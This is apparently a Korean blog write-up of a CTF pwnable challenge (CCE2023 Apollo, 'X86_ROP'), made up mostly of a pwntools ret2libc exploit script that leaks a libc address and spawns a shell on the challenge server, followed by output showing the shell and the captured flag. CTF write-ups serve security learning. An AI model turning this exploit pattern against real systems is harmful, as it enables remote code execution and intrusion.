IT/CTF / / 2023. 6. 6. 11:10

CCE2023 APOLLO PWNABLE [100] - X86_ROP

반응형

Description

X86 ROP

nc prob2.cstec.kr 5340

 

for_user.zip
0.94MB

32비트 ROP 문제. 버퍼 오버플로 취약점이 존재하며, PIE가 꺼져 있다.

#!/usr/bin/python3
from pwn import *

p = remote("prob2.cstec.kr", 5340)

e = ELF("./x86_rop")
l = ELF("./libc.so.6")

p.sendlineafter(b"Enter choice : ", b"1")

r = 0x000000000040101a
pr = 0x080491e5
rdi = 0x0000000000401203

buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(e.plt["puts"])
buf += p32(pr)
buf += p32(e.got["puts"])
buf += p32(e.sym["main"])

p.send(buf)

leak = p.recv(4)
leak = u32(leak)
leak -= l.sym["puts"]

print(hex(leak))

system = leak + l.sym["system"]
binsh = leak + list(l.search(b"/bin/sh"))[0]

p.sendlineafter(b"Enter choice : ", b"1")

buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(system)
buf += p32(pr)
buf += p32(binsh)

p.send(buf)

p.interactive()
root@learner:/home/learner/Downloads/for_user# ./exploit.py
[+] Opening connection to prob2.cstec.kr on port 5340: Done
[*] '/home/learner/Downloads/for_user/x86_rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
0xf7c9c000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{a23c922d5d1c1b7c390241537c5e5021947d94151c4da48986482c4efbe74062ec2ac1f8d0130fa0dacdaf69ccd8c110801c420a86f781391661f0c2cd0b5f8a00}
반응형
  • 네이버 블로그 공유
  • 네이버 밴드 공유
  • 페이스북 공유
  • 카카오스토리 공유